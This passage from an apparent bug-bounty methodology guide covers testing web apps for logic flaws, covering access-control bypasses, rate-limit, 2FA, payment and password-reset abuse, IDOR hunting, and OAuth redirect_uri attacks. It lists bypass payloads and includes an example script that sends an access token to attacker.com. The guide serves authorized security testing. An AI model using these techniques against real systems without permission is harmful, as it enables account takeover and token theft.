* **Cookie -> JSON Web Token (JWT):** Common. Test for [known JWT attacks](https://portswigger.net/web-security/jwt): `alg:none`, signature stripping, weak secrets (brute-force HS256 secret), public key confusion (RS256 -> HS256), `kid` manipulation for arbitrary key selection/SQLi/Path Traversal. Ensure claims like `exp`, `nbf`, `iat` are validated.
* **localStorage/sessionStorage:** Session tokens stored here are accessible via JavaScript (XSS risk). Check how these tokens are generated, validated, and if they contain sensitive data directly. If developers assume localStorage is tamper-proof, logic flaws can arise.
* **Access Control Types Implemented:**
* **Role-Based Access Controls (RBAC):** Users assigned roles (Admin, User, Auditor). Test if users can perform actions outside their role's permissions. Check for hierarchical RBAC flaws (e.g., a "Manager" role improperly inheriting "Admin" rights).
* **Discretionary Access Controls (DAC):** Owners of resources grant access to others (e.g., Google Docs sharing, Jira project members). Test if you can access/modify resources you weren't granted access to, or escalate privileges within a shared resource. Often combined with RBAC.
* **Policy-Based Access Controls (PBAC) / Attribute-Based (ABAC):** Granular controls based on policies/attributes of user, resource, and environment. Complex to implement correctly, high chance of gaps. Test various combinations of attributes.
* **API Availability and Design:**
* **API First Design:** All data operations go via API calls. Can make enumeration easier but also means security controls might be more consistently applied.
* **Internal vs. External API:** External APIs (for third-party developers) usually have stricter auth (API keys) and documentation. Internal APIs (used by the app's own frontend) might use session cookies and be less documented publicly.
* **API Documentation (Swagger/OpenAPI, Postman Collections):** Goldmine for understanding endpoints, parameters, and expected behavior. However, always fuzz for undocumented endpoints, parameters, or HTTP methods.
* **Cross-Origin Resource Sharing (CORS) Implementation:**
* If `Access-Control-Allow-Origin` header reflects the `Origin` header from the request, or uses overly permissive wildcards (`*` with `Access-Control-Allow-Credentials: true` is bad), it can enable cross-origin attacks.
* If it allows any subdomain (e.g., `*.target.com`), look for subdomain takeovers to bypass CORS.
* Test for misconfigurations in `Access-Control-Allow-Methods`, `Access-Control-Allow-Headers`.
* **WebSockets Usage:**
* Stateful connections. Once established, the server might implicitly trust messages from that connection.
* Intercept WebSocket traffic (Burp Suite supports this). Fuzz messages for injection vulnerabilities or logic flaws specific to the WebSocket communication protocol. Are access controls re-verified for actions taken over WebSockets?
Section 3.3: Enumerate The Application Mechanisms
Map every user-facing and API functionality to specific HTTP requests and CRUD (Create, Read, Update, Delete) operations. Think like a Quality Engineer: How would you write automated tests for every feature? This helps identify individual test cases.
-
CREATE Examples:
-
POST /user/register --data {"username":"rs0n","password":"P@s$w0rd!"}
- Function: Allows unauthenticated users to create an account.
- IDOR Potential: Usually N/A for the creation act itself.
- Access Control Violation (ACV) Potential: N/A (designed for unauthenticated).
-
POST /workspace --data {"name":"shared workspace 1"}
(Requires Admin role)- Function: Allows Admin users to create a new Workspace.
- IDOR Potential: N/A for creation.
- ACV Potential: High. Can a non-Admin user create a workspace?
-
-
READ Examples:
-
POST /user/login --data {"username":"rs0n","password":"P@s$w0rd!"}
- Function: Authenticates a user.
- IDOR Potential: N/A (response depends on input, not existing identity context).
- ACV Potential: N/A.
-
GET /admin/user/[USER_ID]/search
(Requires Admin role in specific Workspace)- Function: Allows Admin to search user details within their Workspace.
-
IDOR Potential: High. Can Admin access user info from a Workspace they don't belong to by changing
[USER_ID]
or an implicit workspace ID? - ACV Potential: High. Can a non-Admin access this endpoint?
-
-
UPDATE Examples:
-
POST /user/profile/update/username --data {"username":"rs0n_live"}
- Function: Allows authenticated user to change their username.
-
IDOR Potential: High. If
user_id
is in a parameter, can it be changed to update another user? If identification is via session, this is harder but check if session can be fixed/hijacked. - ACV Potential: Low for authenticated users (all should be able to update their own). Could an unauthenticated user hit this if they spoof session data or if auth check is missing?
-
PATCH /workspace/[WORKSPACE_ID] --data {"description":"New desc"}
- Function: Allows members of a workspace to update its description.
-
IDOR Potential: High. Can a user update a workspace they are not a member of by changing
[WORKSPACE_ID]
? - ACV Potential: Blurry with IDOR here. Is there a specific role required even if you are a member?
-
-
DELETE Examples:
-
POST /user/delete --data {"username":"rs0n","password":"P@s$w0rd!","confirm":true}
- Function: Allows a user to delete their own account.
-
IDOR Potential: High. If identification relies on
username
parameter or a modifiable ID, can another user's account be deleted? - ACV Potential: Low for own account deletion.
-
Section 3.4: Test The Application (Exploiting Logic Flaws)
With a deep understanding and enumerated mechanisms, begin targeted testing.
- Missing Security Controls:
* **Lack of Access Controls:** The most straightforward logic flaw: a developer simply forgot to implement an authorization check.
* **Unauthenticated -> Authenticated:** Can an unauthenticated user access `/querytool` which should be for authenticated users?
* **RBAC Failure:** Can an `Auditor` role (meant for READ-only) execute an UPDATE mechanism?
* **DAC Failure:** Can a user without explicit access to Workspace `X` still modify its description via `PATCH /workspace/X/desc`?
* **PBAC Failure:** Can a user without the `project:delete` policy still delete a project?
* **Lack of Rate Limiting:**
* Identify mechanisms that *should* have rate limits (login, password reset, voucher application, expensive computations) but don't.
* Show clear impact: Does spamming an endpoint cause denial of service for others? Does it allow brute-forcing (e.g., OTPs)? Does it cause a security control to [fail open](https://community.cisco.com/t5/security-knowledge-base/fail-open-amp-fail-close-explanation/ta-p/5012930)? (Many programs are picky about rate limiting reports without clear, direct security impact beyond resource consumption).
- Bypass Existing Security Controls:
* **[Bypassing Access Controls (401/403 Bypasses)](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/403-and-401-bypasses):**
* **IP Address Restrictions:** Try using HTTP Proxy Headers (`X-Forwarded-For`, `X-Real-IP`, `Forwarded`, etc.) to spoof source IP. Look for SSRF vulnerabilities that allow requests from an internal IP.
* **Path Fuzzing/Normalization:** If `/admin/login` is forbidden:
* Try case changes: `/ADMIN/LOGIN`, `/Admin/Login`.
* Path traversal/manipulation: `/admin/./login`, `/admin//login`, `/admin;/login`, `/admin/login/.`, `/%2e/admin/login`, `/admin%20/login`.
* Use tools like Burp's `403Bypasser` extension or `ffuf` with path fuzzing wordlists.
* **Unexpected Access Patterns/Host Header Manipulation:** Access via IP address instead of FQDN. If CNAME exists, try both domains. Try HTTP on HTTPS endpoints (port 80). Downgrade HTTP/2 to HTTP/1.1. Manipulate the `Host` header.
* **Hidden Parameters:** Add parameters like `isAdmin=true`, `debug=true`, `role=admin`.
* **Change HTTP Method:** Try `GET` if `POST` is blocked, or `PUT`, `PATCH`, `DELETE`.
* **[Bypassing Rate Limiting](https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass):**
* **User Account Based:** If rate limiting is tied to user ID/username, can you change your user ID (e.g., if it's in a parameter) or re-register to get a new quota?
* **IP Address Based:**
* Use proxy headers (`X-Forwarded-For`, etc.). Some systems might pick the first IP, last IP, or a specific one if multiple are provided.
* Use a distributed network of proxies/VPNs.
* Append null bytes or special characters to the IP if it's being processed as a string.
* IPv6 variations if IPv4 is blocked (`::ffff:1.2.3.4`).
* **[Bypassing 2FA/MFA](https://book.hacktricks.xyz/pentesting-web/2fa-bypass):**
* **Response Manipulation:** After submitting username/password, if the server responds with "2FA required," can you modify this response client-side (if client trusts it) or capture a later request and remove 2FA-related parameters?
* **Direct Access to Post-2FA Pages:** Can you skip the 2FA page and directly browse to an application page that assumes 2FA was completed?
* **Token Leakage/Replay:** Is the 2FA token leaked in a URL or response? Can it be replayed? Is there a lack of rate limiting on 2FA code submission?
* **Backup Code Flaws:** Weak backup codes, or ability to generate/reuse them insecurely.
* OAUTH/SSO Misconfiguration bypassing 2FA for primary authentication.
* CSRF on 2FA disabling.
* **[Bypassing Payment Process Restrictions](https://book.hacktricks.xyz/pentesting-web/bypass-payment-process):**
* **Price Manipulation:** Change item price or quantity parameters to negative numbers or zero.
* **Currency Manipulation:** Change currency to a cheaper one if not validated.
* **Tamper with Total Amount:** If the total amount is sent as a parameter, modify it.
* **Interrupt Payment Flow:** Can you complete an order by dropping the final request to the payment gateway but still having the application mark the order as paid? (Race conditions).
* **Voucher/Discount Abuse:** Apply multiple discounts, reuse single-use vouchers, or apply expired ones.
* **[Bypassing Registration Restrictions](https://book.hacktricks.xyz/pentesting-web/registration-vulnerabilities):**
* Use character encoding or case variations to bypass username/email blocklists.
* Exploit parameter pollution if registration data is sent in multiple places.
* If registration requires an invite code, try to brute-force it or find a logic flaw that bypasses the check.
* Register with an email address that has the same unique identifier as an existing account but uses allowed variations (e.g., `user.name@gmail.com` vs. `username@gmail.com`, or `user+victim@example.com`).
* **[Bypassing Password Reset Restrictions](https://book.hacktricks.xyz/pentesting-web/reset-password):**
* **Host Header Poisoning:** If the password reset link is generated using the `Host` header, manipulate it to point to your server to capture the reset token. Test with `X-Forwarded-Host` as well.
* **Token Leakage:** Is the reset token leaked via `Referer` header to third parties?
* **Weak Token Generation/No Rate Limiting:** Brute-force short or predictable reset tokens.
* **Parameter Tampering:** In the final step of setting a new password, can you change a `user_id` parameter to reset someone else's password if the token validation is tied only to the token itself and not the user it was issued for?
* **Response Manipulation:** After entering the email, if the server returns the security questions, can you bypass this step?
- Insecure Direct Object References (IDOR):
* **Summary:** IDORs occur when an application uses user-supplied input (e.g., an ID in a URL or request body) to access objects directly without verifying if the logged-in user is authorized to access that specific object.
* *Reference: [YouTube Video - [Part I] Bug Bounty Hunting for IDORs and Access Control Violations](https://youtu.be/BfbS8uRjeAg)* (Placeholder)
* *Reference: [YouTube Video - Ask Yourself These Four Questions When Bug Bounty Hunting for IDORs](https://youtu.be/4h42AFrpyK0)* (Placeholder)
* **Basic IDOR Hunting Steps:**
1. **Identify Mechanisms:** Find all functionalities that perform READ, UPDATE, or DELETE operations on specific objects (e.g., view profile, edit message, delete document).
2. **Locate Identifiers:** Determine how the object being accessed is identified:
* **From Session Token (Implicit):** E.g., `/profile/me` fetches the current user's profile. Harder to find IDORs unless session can be manipulated or there's an internal mapping flaw.
* **From Signed/Encrypted Identifier:** E.g., a JWT claim or an encrypted ID. You'd need to break the signature/encryption first, or find flaws in how it's processed.
* **From User-Controlled Parameter (Explicit):** E.g., `GET /users?id=123`, `POST /messages/delete` with `{"message_id": 456}`. This is the most common IDOR vector. Also check for UUIDs, usernames, emails, or even less obvious sequential identifiers.
3. **Obtain Other Users' Identifiers:** Create multiple accounts or find ways to enumerate/guess identifiers of other users/objects you shouldn't have access to.
4. **Test Authorization:** Substitute the victim's identifier into the request and see if you can access/modify their data. Check all CRUD operations.
* **Key Questions for IDOR Hunting per Mechanism:**
* *Does the endpoint's response vary based on the client's identity for the same object ID (unlikely for IDOR, more for ACV)?* More relevant: *Does the endpoint return different objects based on an ID I control?*
* *Does the endpoint identify the client implicitly via a session token (making IDORs on that object harder), or explicitly via an ID in the request?*
* *If an ID is used, is it signed/encrypted (requiring more steps) or plaintext/guessable?*
* *Is the ID pulled directly from a parameter, header, or cookie value I control?*
- OAuth 2.0 Testing:
* **Summary:** OAuth is complex, with various grant types and optional parameters, making misconfigurations common. It's an authorization framework, often misused for authentication.
* **Key Areas:** `redirect_uri` validation, `state` parameter usage, scope handling, client authentication (for confidential clients).
* **Steps of OAuth (Focus on Authorization Code Grant):**
1. **Authorization Request (Client to Authorization Server):**
```
GET /authorization?client_id=12345&redirect_uri=[https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24](https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24) HTTP/1.1
Host: oauth-authorization-server.com
```
* **Test Points:**
* `redirect_uri`: Is it strictly validated? (See below)
* `response_type`: Can it be changed to `token` (Implicit grant) if not intended?
* `scope`: Are overly broad scopes requested or accepted?
* `state`: Is it present and non-guessable? (Prevents CSRF)
2. **User Consent (User authenticates and approves at Authorization Server).**
3. **Authorization Code Grant (Authorization Server to Client via redirect):**
```
GET [https://client-app.com/callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24](https://client-app.com/callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24) HTTP/1.1
Host: client-app.com
```
* **Test Points:**
* Is the `code` short-lived and one-time use?
* Is the `state` parameter validated by the client against the original one? If not, CSRF is possible (e.g., attacker tricks victim into linking attacker's account from OAuth provider to victim's client app account).
4. **Access Token Request (Client to Authorization Server - backend):**
```
POST /token HTTP/1.1
Host: oauth-authorization-server.com
...
client_id=12345&client_secret=SECRET&redirect_uri=[https://client-app.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8](https://client-app.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8)
```
* **Test Points:**
* `client_secret`: For confidential clients. Is it leaked?
* `redirect_uri`: Does the Authorization Server re-validate it here against the initial one?
* `code`: Is it validated properly?
* `grant_type`: Correct for the flow.
5. **Access Token Grant (Authorization Server to Client):**
* Server responds with Bearer Token (Access Token, potentially Refresh Token, ID Token).
6. **API Call (Client to Resource Server):**
* Client uses Access Token in `Authorization: Bearer <token>` header.
7. **Resource Grant (Resource Server to Client):**
* Resource server validates token and returns data.
* **OAuth Hunting Steps:**
1. **Discover OAuth Flows:** Search HTTP traffic for OAuth parameters (`client_id`, `redirect_uri`, `response_type`, `state`, `scope`).
2. **Identify Authorization Server Endpoints:** Look for well-known URIs:
* `/.well-known/oauth-authorization-server`
* `/.well-known/openid-configuration` (for OpenID Connect, built on OAuth)
3. **Identify Grant Type:** Primarily from `response_type` (`code` for Auth Code, `token` for Implicit).
4. **Test for Common Misconfigurations:**
* **Implicit Grant Issues (`response_type=token`):** Access token is passed in URL fragment. Higher risk of leakage (browser history, Referer). If used for authentication, any data in the initial POST request to the client app might not be validated against the OAuth identity.
* **Missing/Weak `state` Parameter (Auth Code Grant):** Leads to CSRF on the callback, allowing an attacker to link their OAuth provider account to the victim's client application account.
* **Stealing `code`/`token` via `redirect_uri`:**
* **No/Weak Validation:** If `redirect_uri` is not validated or loosely validated, an attacker can set it to their own domain/path.
* **Redirect Possibilities/Bypass Techniques:**
1. Any domain: `redirect_uri=https://attacker.com`
2. Any subdomain: `redirect_uri=https://attacker.victim.com` (if `victim.com` is trusted, look for subdomain takeover).
3. Specific domains (Whitelist): Check if any whitelisted domains have open redirect vulnerabilities or allow user content that can steal tokens.
4. Path Traversal: `redirect_uri=https://client-app.com/legit_path/../../attacker_path`
5. Different Scheme: `redirect_uri=javascript:alert(document.domain)` (unlikely but possible).
6. Parameter Pollution/Appending: `redirect_uri=https://client-app.com/callback?attacker_param=foo` or using `#` to inject data.
7. Regex bypasses for whitelist validation (e.g., `https://client-app.com.attacker.com` if regex is `^https://client-app\.com`).
* **Exploitation:** Attacker crafts a malicious link with a poisoned `redirect_uri`. Victim clicks, authenticates, and the `code` or `token` is sent to the attacker's controlled URI.
* ***Note:*** If `redirect_uri` parameter is *also* sent in the Access Token Request (Step 4) and validated by the Authorization Server against the initial `redirect_uri`, this mitigates `code` theft for that step.
* **Stealing Data from URL Hash Fragments (`#`):** If a token is in the fragment (`#access_token=...`), it's not sent to the server. Client-side script processes it. If this script insecurely sends fragment data to another server (e.g., via `<img>` src, or XHR to attacker site), it can be stolen. Example vulnerable script:
```javascript
// Vulnerable script on [client-app.com/callback](https://client-app.com/callback)
if (document.location.hash) {
var params = new URLSearchParams(document.location.hash.substr(1));
// If token is sent to an attacker-controlled logger or image
new Image().src = '[https://attacker.com/log?token=](https://attacker.com/log?token=)' + params.get('access_token');
}
```
* **Scope Escalation/Misconfiguration:**
* **Authorization Code Grant:** Malicious client registers with limited scope, victim approves. Client then requests an access token from `/token` endpoint but specifies expanded scopes. If AS doesn't validate requested scopes against originally approved ones, it might issue an over-privileged token.
* **Implicit Grant:** If an attacker steals a token, they might try using it for scopes the user didn't explicitly grant, if the resource server doesn't properly validate scopes per token.
* **Account Takeover via OAuth Registration/Login:**
* If an application allows "Sign up with X Provider" and "Log in with X Provider," check for logic flaws. If the email from the OAuth provider is used as the primary identifier, can an attacker:
1. Create an account on the OAuth provider with the victim's email (if possible).
2. Then use "Sign up with X Provider" on the client app to link to victim's (potentially existing) account or create a new one under victim's email.
* **OpenID Connect (OIDC) Specifics (often used with OAuth):**
* Uses **ID Tokens (JWTs)** for identity information.
* `id_token` contains claims about the user. Validate its signature and claims (`iss`, `aud`, `exp`, `nonce`).
* Keys for JWT signature validation often exposed at `/.well-known/jwks.json` (from OIDC provider).
* OIDC provider configuration usually at `/.well-known/openid-configuration`.
* `response_type` can be combined: `id_token token` (Implicit), `id_token code`.
* **Dynamic Client Registration:** If the OIDC provider allows clients (applications) to register dynamically, check if this registration process is authenticated or can be abused for SSRF (e.g., if `logo_uri` or `jwks_uri` parameters in registration are fetched server-side by the OIDC provider).
Top comments (0)